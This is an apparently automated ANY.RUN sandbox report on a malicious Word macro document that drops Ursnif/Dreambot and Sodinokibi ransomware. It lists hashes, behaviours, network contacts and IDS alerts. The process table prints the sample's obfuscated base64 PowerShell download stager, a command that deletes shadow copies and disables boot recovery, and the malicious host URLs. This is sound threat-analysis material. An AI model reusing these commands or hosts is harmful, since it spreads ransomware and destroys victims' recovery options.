analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

info_17.07.doc

Full analysis: https://app.any.run/tasks/502cf3ef-3384-46b5-9648-e281bf92a19c
Verdict: Malicious activity
Threats:

Ransomware is a type of malicious software that locks users out of their system or data using different methods to force them to pay a ransom. Most often, such programs encrypt files on an infected machine and demand a fee to be paid in exchange for the decryption key. Additionally, such programs can be used to steal sensitive information from the compromised computer and even conduct DDoS attacks against affected organizations to pressure them into paying.

Analysis date: July 17, 2019, 10:38:43
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
gozi
ursnif
ransomware
sodinokibi
trojan
dreambot
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: sriojzxfxdemk, Subject: lyiiysboes, Comments: ibwccqlrmfkueaktwuvguyfovm, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Apr 25 22:21:00 2018, Last Saved Time/Date: Tue Jul 16 21:37:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

9B637E90A4FCD86F2070D60A4F42CC52

SHA1:

F230E8702B407BE48B1116BEBEF8A327061D980E

SHA256:

E8C1360A9B36EF1E4F93FC17D95963A47EC87AD3C3D85A5E0A16C29D00D53CD9

SSDEEP:

1536:CNjjRTtFciqcBC1phobHbbtx894qoTbWVy3CI3rqJK:IjjR7CLGwSx2qv5

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2832)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2832)
    • Application was dropped or rewritten from another process

      • FJkRriTG.exe (PID: 2756)
    • URSNIF was detected

      • powershell.exe (PID: 3940)
      • iexplore.exe (PID: 2664)
    • Sodinokibi keys found

      • powershell.exe (PID: 3940)
    • Deletes shadow copies

      • cmd.exe (PID: 3516)
    • Sodinokibi ransom note found

      • powershell.exe (PID: 3940)
    • Renames files like Ransomware

      • powershell.exe (PID: 3940)
    • Starts BCDEDIT.EXE to disable recovery

      • cmd.exe (PID: 3516)
    • Dropped file may contain instructions of ransomware

      • powershell.exe (PID: 3940)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3940)
    • Connects to CnC server

      • iexplore.exe (PID: 2664)
    • Changes settings of System certificates

      • powershell.exe (PID: 3940)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2232)
      • powershell.exe (PID: 3940)
    • Application launched itself

      • powershell.exe (PID: 2232)
    • Executed via COM

      • unsecapp.exe (PID: 3304)
      • iexplore.exe (PID: 888)
    • Executes PowerShell scripts

      • powershell.exe (PID: 2232)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 3940)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3940)
    • Creates files in the program directory

      • powershell.exe (PID: 3940)
    • Creates files like Ransomware instruction

      • powershell.exe (PID: 3940)
    • Executed as Windows Service

      • vssvc.exe (PID: 2332)
    • Adds / modifies Windows certificates

      • powershell.exe (PID: 3940)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2832)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2832)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2232)
      • powershell.exe (PID: 3940)
    • Dropped object may contain TOR URL's

      • powershell.exe (PID: 3940)
    • Application launched itself

      • iexplore.exe (PID: 888)
    • Changes internet zones settings

      • iexplore.exe (PID: 888)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: sriojzxfxdemk
Subject: lyiiysboes
Author: -
Keywords: -
Comments: ibwccqlrmfkueaktwuvguyfovm
Template: Normal
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:04:25 21:21:00
ModifyDate: 2019:07:16 20:37:00
Pages: 1
Words: -
Characters: 1
Security: None
CodePage: Windows Cyrillic
Manager: -
Company: -
Bytes: 22528
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 1
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • sriojzxfxdemk
HeadingPairs:
  • Title
  • 1
  • Название
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
54
Monitored processes
12
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs powershell.exe #URSNIF powershell.exe fjkrritg.exe no specs unsecapp.exe no specs cmd.exe no specs vssadmin.exe no specs vssvc.exe no specs bcdedit.exe no specs bcdedit.exe no specs iexplore.exe #URSNIF iexplore.exe

Process information

PID
CMD
Path
Indicators
Parent process
2832"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\info_17.07.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2232"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Enc IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtACgAWwBzAHkAUwB0AGUAbQAuAEkATwAuAE0ARQBNAE8AcgBZAHMAdAByAGUAQQBtAF0AWwBzAFkAUwBUAGUATQAuAEMATwBOAFYAZQByAFQAXQA6ADoARgBSAG8ATQBCAGEAcwBlADYANABzAHQAcgBpAG4ARwAoACcAVABaAEIAZgBiADQASQB3AEYATQBYAGYAbAArAHcANwA5AEkARwBsAEUARwBhAEoAbQA0AHMASwBJAGMAcwBpAHoAcgBBAFoATgBQADQASgBTADcAWQBsAEYAaQB6AFEAVwBXAGwARABxADgAaQBJADMAMwAwAHMAVQBiAGUAWABlADEALwBPAHUAZgBmADgAagB1AFoAWAB2AHMAQwB2AGMAKwBBAEMAKwBQAHkAeQBtAFIAVgAwAE0AWQBLAE8AdABoAFMAbABDAEUATgBYAEkALwBuAGUAMwBrAGwAUwBpAEkASQBuAGwAQgBFAFQAZgBrAEIAVABPADEAbABNAGkATQBpAEIATgBHAEwAZQBTAGYAcgBMAHQAWQB0ADAAbQBFAE0AVABrAHIATABGAG0AeABWADkAawBWAGgAQgBBAHcAUgBrAHQAVgBpAGgAawBFAFMAcgB3AFoAaQBTAFkATwBGAG8AKwA5ADMATQBtAHoAeAA5AEQAMQB5AFkASwBTAFYAcwB5ADAAcABpAHYASwAwAFkASQB6AFEAcQBjAEUAYQAzAFMASABGAGgAeQBhAHIAawBWAHAASgB5AFgAaQBLAFIAaQBVAGYAbQByAGcAOAB4AHcAMQBKADIAVQBYAHAAZwBFAEUAbgBCAHEATgBMAGgARABUAFMAYwBoAEIAYwBFAHgANQBtAHUAKwBWAE8AeAA3AFEAUQAwAEIARABRAEgAbAB5AGQARwByAFkAcQBxAFAAawBWAEUASABpADgARAB4AHIARwBYACsARwB6ADQAWgA3AGcARgBKADEANwBEADgAUgBPAGcANgB3ADMASQBpAEsAaQBXADMAMQBBAG8AMABvAHgAdABnADMARgBXAEkARABZAE0AUgBpAG8ARAByAFoAUwBBAHUAMwA2ADMAYQA0AEQANgAzAGEATQA0AHoAYgBsAFUATgBKAFoAbwBXAHYAQwBZAFMAUABsAHAAMgAvAE0ARgBuAGkAbgA5AGMAagBsAHEAVQBtADYAYwA0AHoASABHAEsAcwA3AHEANAA5AEUAQgAvAHYAQgBOAC8AeABjAHMASAAwACsAdwBOADEAZQBGAG4ANgBmADYAdQBaAGwAMgA3AHcARwAxACsALwBlAG8AMwBXAG0AagB1ADAANwBQAFMAdQBWAHYARwA5AEEAdwBuAE8AdQByAEgAdwA9AD0AJwApACAALABbAHMAWQBzAFQAZQBtAC4AaQBvAC4AYwBPAE0AcABSAGUAUwBzAGkATwBOAC4AQwBvAG0AcAByAGUAcwBzAEkATwBOAE0ATwBEAEUAXQA6ADoARABFAEMAbwBtAHAAcgBlAFMAUwAgACkAfAAmACgAJwBmACcAKwAnAG8AcgBlACcAKwAnAGEAYwBIACcAKQB7ACAAJgAoACcATgBFAFcALQBvAGIAJwArACcASgAnACsAJwBFAGMAVAAnACkAIAAgAGkAYABvAC4AYABTAGAAVAByAGUAYQBtAFIARQBBAEQARQBSACgAJABfACwAWwBzAHkAUwBUAGUAbQAuAFQARQB4AFQALgBFAE4AYwBvAGQASQBuAEcAXQA6ADoAYQBzAEMAaQBpACkAIAB9AHwALgAoACcARgBvAHIARQBhACcAKwAnAEMAJwArACcASAAnACkAewAkAF8ALgByAGUAYQBkAHQAbwBlAG4AZAAoACkAIAB9ACAAKQAgAHwALgAoACcASQAnACsAJwBFACcAIAArACAAJwBYACcAKQA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3940"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Enc IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtACgAWwBzAHkAUwB0AGUAbQAuAEkATwAuAE0ARQBNAE8AcgBZAHMAdAByAGUAQQBtAF0AWwBzAFkAUwBUAGUATQAuAEMATwBOAFYAZQByAFQAXQA6ADoARgBSAG8ATQBCAGEAcwBlADYANABzAHQAcgBpAG4ARwAoACcAVABaAEIAZgBiADQASQB3AEYATQBYAGYAbAArAHcANwA5AEkARwBsAEUARwBhAEoAbQA0AHMASwBJAGMAcwBpAHoAcgBBAFoATgBQADQASgBTADcAWQBsAEYAaQB6AFEAVwBXAGwARABxADgAaQBJADMAMwAwAHMAVQBiAGUAWABlADEALwBPAHUAZgBmADgAagB1AFoAWAB2AHMAQwB2AGMAKwBBAEMAKwBQAHkAeQBtAFIAVgAwAE0AWQBLAE8AdABoAFMAbABDAEUATgBYAEkALwBuAGUAMwBrAGwAUwBpAEkASQBuAGwAQgBFAFQAZgBrAEIAVABPADEAbABNAGkATQBpAEIATgBHAEwAZQBTAGYAcgBMAHQAWQB0ADAAbQBFAE0AVABrAHIATABGAG0AeABWADkAawBWAGgAQgBBAHcAUgBrAHQAVgBpAGgAawBFAFMAcgB3AFoAaQBTAFkATwBGAG8AKwA5ADMATQBtAHoAeAA5AEQAMQB5AFkASwBTAFYAcwB5ADAAcABpAHYASwAwAFkASQB6AFEAcQBjAEUAYQAzAFMASABGAGgAeQBhAHIAawBWAHAASgB5AFgAaQBLAFIAaQBVAGYAbQByAGcAOAB4AHcAMQBKADIAVQBYAHAAZwBFAEUAbgBCAHEATgBMAGgARABUAFMAYwBoAEIAYwBFAHgANQBtAHUAKwBWAE8AeAA3AFEAUQAwAEIARABRAEgAbAB5AGQARwByAFkAcQBxAFAAawBWAEUASABpADgARAB4AHIARwBYACsARwB6ADQAWgA3AGcARgBKADEANwBEADgAUgBPAGcANgB3ADMASQBpAEsAaQBXADMAMQBBAG8AMABvAHgAdABnADMARgBXAEkARABZAE0AUgBpAG8ARAByAFoAUwBBAHUAMwA2ADMAYQA0AEQANgAzAGEATQA0AHoAYgBsAFUATgBKAFoAbwBXAHYAQwBZAFMAUABsAHAAMgAvAE0ARgBuAGkAbgA5AGMAagBsAHEAVQBtADYAYwA0AHoASABHAEsAcwA3AHEANAA5AEUAQgAvAHYAQgBOAC8AeABjAHMASAAwACsAdwBOADEAZQBGAG4ANgBmADYAdQBaAGwAMgA3AHcARwAxACsALwBlAG8AMwBXAG0AagB1ADAANwBQAFMAdQBWAHYARwA5AEEAdwBuAE8AdQByAEgAdwA9AD0AJwApACAALABbAHMAWQBzAFQAZQBtAC4AaQBvAC4AYwBPAE0AcABSAGUAUwBzAGkATwBOAC4AQwBvAG0AcAByAGUAcwBzAEkATwBOAE0ATwBEAEUAXQA6ADoARABFAEMAbwBtAHAAcgBlAFMAUwAgACkAfAAmACgAJwBmACcAKwAnAG8AcgBlACcAKwAnAGEAYwBIACcAKQB7ACAAJgAoACcATgBFAFcALQBvAGIAJwArACcASgAnACsAJwBFAGMAVAAnACkAIAAgAGkAYABvAC4AYABTAGAAVAByAGUAYQBtAFIARQBBAEQARQBSACgAJABfACwAWwBzAHkAUwBUAGUAbQAuAFQARQB4AFQALgBFAE4AYwBvAGQASQBuAEcAXQA6ADoAYQBzAEMAaQBpACkAIAB9AHwALgAoACcARgBvAHIARQBhACcAKwAnAEMAJwArACcASAAnACkAewAkAF8ALgByAGUAYQBkAHQAbwBlAG4AZAAoACkAIAB9ACAAKQAgAHwALgAoACcASQAnACsAJwBFACcAIAArACAAJwBYACcAKQA= C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2756"C:\Users\admin\FJkRriTG.exe" C:\Users\admin\FJkRriTG.exepowershell.exe
User:
admin
Integrity Level:
HIGH
3304C:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\wbem\unsecapp.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Sink to receive asynchronous callbacks for WMI client application
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3516"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailuresC:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2988vssadmin.exe Delete Shadows /All /Quiet C:\Windows\system32\vssadmin.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Command Line Interface for Microsoft® Volume Shadow Copy Service
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2332C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft® Volume Shadow Copy Service
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3692bcdedit /set {default} recoveryenabled No C:\Windows\system32\bcdedit.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Boot Configuration Data Editor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3556bcdedit /set {default} bootstatuspolicy ignoreallfailuresC:\Windows\system32\bcdedit.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Boot Configuration Data Editor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
2 249
Read events
1 649
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
180
Text files
9
Unknown types
6

Dropped files

PID
Process
Filename
Type
2832WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE9C5.tmp.cvr
MD5:
SHA256:
2232powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KZBUERARN7XWG7XSIO60.temp
MD5:
SHA256:
3940powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\115ERC5ZG5LAHHFS57UI.temp
MD5:
SHA256:
2832WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF0D93ABF244B056FC.TMP
MD5:
SHA256:
2832WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF7AF3C29640451852.TMP
MD5:
SHA256:
2832WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF29C025CA748C1130.TMP
MD5:
SHA256:
2832WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:69CD2951B7873A8EA77F8A55393907E1
SHA256:8F548F6EB38E6D85819C198E162DA821F11AD0589BA07907D510B1C1F4903535
2232powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF10f57d.TMPbinary
MD5:4B92A079D7F4DFA0DFE9125E60FE7814
SHA256:E96B52BC25AE8BA162760C1F5159606ED78EB1EC4CBA0F98AAD2915AE22D8E04
2232powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:4B92A079D7F4DFA0DFE9125E60FE7814
SHA256:E96B52BC25AE8BA162760C1F5159606ED78EB1EC4CBA0F98AAD2915AE22D8E04
3940powershell.exeC:\program files\8p168ofux-readme.txtbinary
MD5:4B935EF111EB9D9C19DC0D93302848C3
SHA256:D2CC0B721F9BA218C424526966D99F1460F26DF9C3586F61C4060EF7F6FCCEDD
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
36
DNS requests
29
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3940
powershell.exe
GET
200
185.193.141.146:80
http://fcamylleibrahim.top/sywo/fgoow.php?l=dxclass7.gxl
RU
executable
472 Kb
malicious
3940
powershell.exe
GET
200
185.193.141.248:80
http://185.193.141.248/gs.php
RU
text
406 b
suspicious
3940
powershell.exe
GET
200
8.241.122.126:80
http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
US
compressed
56.3 Kb
whitelisted
2232
powershell.exe
GET
200
185.193.141.248:80
http://185.193.141.248/gs.php
RU
text
406 b
suspicious
888
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
2664
iexplore.exe
GET
301
40.76.4.15:80
http://microsoft.com/images/RlnnXP5q/6q3LJwXk1MBorG8kpmcipDN/Ky_2BxHRGe/PLpIRb7h0S969iC_2/BXgIurhRjfr1/bbRJeoSfPXx/kePtEp7bTdB0Ip/wEQrr7gPfa_2FEGd2NPX6/XVO7272_2Fbq_2FH/QFa2Wbsj9XNIrS3/h7PPrrUAptR75Rf6nG/UUiWR80d4/lp2S2SS.avi
US
whitelisted
3940
powershell.exe
GET
200
8.241.122.126:80
http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E.crt
US
der
993 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3940
powershell.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
2232
powershell.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
2232
powershell.exe
185.193.141.248:80
IT Mir LLC
RU
suspicious
3940
powershell.exe
185.193.141.248:80
IT Mir LLC
RU
suspicious
3940
powershell.exe
185.193.141.146:80
fcamylleibrahim.top
IT Mir LLC
RU
suspicious
2232
powershell.exe
185.193.141.146:80
fcamylleibrahim.top
IT Mir LLC
RU
suspicious
3940
powershell.exe
94.231.107.137:443
trivselsguide.dk
Zitcom A/S
DK
suspicious
3940
powershell.exe
209.97.129.7:443
logosindustries.com
US
malicious
3940
powershell.exe
104.27.174.164:443
martinipstudios.com
Cloudflare Inc
US
shared
3940
powershell.exe
178.77.86.131:443
soundseeing.net
PlusServer GmbH
DE
suspicious

DNS requests

Domain
IP
Reputation
fcamylleibrahim.top
  • 185.193.141.146
malicious
pastebin.com
  • 104.20.209.21
  • 104.20.208.21
shared
trivselsguide.dk
  • 94.231.107.137
suspicious
production-stills.co.uk
  • 208.113.140.37
suspicious
logosindustries.com
  • 209.97.129.7
suspicious
www.logosindustries.com
  • 209.97.129.7
malicious
tilldeeke.de
  • 95.143.172.245
malicious
martinipstudios.com
  • 104.27.174.164
  • 104.27.175.164
unknown
soundseeing.net
  • 178.77.86.131
suspicious
www.download.windowsupdate.com
  • 8.241.122.126
  • 8.248.125.254
  • 8.248.131.254
  • 8.241.121.126
  • 67.27.159.126
whitelisted

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
2232
powershell.exe
A Network Trojan was detected
ET INFO PowerShell DownloadString Command Common In Powershell Stagers
3940
powershell.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
3940
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3940
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3940
powershell.exe
Misc activity
ET INFO Possible EXE Download From Suspicious TLD
3940
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3940
powershell.exe
A Network Trojan was detected
ET INFO PowerShell DownloadString Command Common In Powershell Stagers
Potentially Bad Traffic
ET DNS Query for .su TLD (Soviet Union) Often Malware Related
2664
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
3 ETPRO signatures available at the full report
No debug info